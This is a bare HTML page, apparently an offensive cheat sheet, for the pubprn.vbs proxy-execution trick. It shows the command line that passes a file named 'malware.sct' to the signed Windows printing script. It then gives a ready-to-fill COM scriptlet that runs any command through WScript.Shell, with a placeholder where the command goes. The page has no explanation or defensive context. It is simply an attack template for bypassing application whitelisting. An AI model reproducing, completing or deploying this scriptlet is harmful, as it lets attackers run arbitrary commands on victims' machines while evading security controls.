<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Pubprn.vbs</title>
</head><body>C:\Windows\System32\Printing_Admin_Scripts\en-US&gt; pubprn.vbs 127.0.0.1 malware.sct<br/>
<br/>
<br/>
<br/>
##########################################################################<br/>
Do not edit the below code<br/>
##########################################################################<br/>
<br/>
<br/>
&lt;?XML version="1.0"?&gt;<br/>
&lt;scriptlet&gt;<br/>
<br/>
&lt;registration<br/>
&nbsp; &nbsp; description="Bandit"<br/>
&nbsp; &nbsp; progid="Bandit"<br/>
&nbsp; &nbsp; version="1.00"<br/>
&nbsp; &nbsp; classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"<br/>
&nbsp; &nbsp; remotable="true"<br/>
&#09;&gt;<br/>
&lt;/registration&gt;<br/>
<br/>
&lt;script language="JScript"&gt;<br/>
&lt;![CDATA[<br/>
<br/>
&#09;var r = new ActiveXObject("WScript.Shell").Run("enter in comand here");<br/>
&#09;<br/>
&#09;<br/>
]]&gt;<br/>
&lt;/script&gt;<br/>
<br/>
&lt;/scriptlet&gt;</body></html>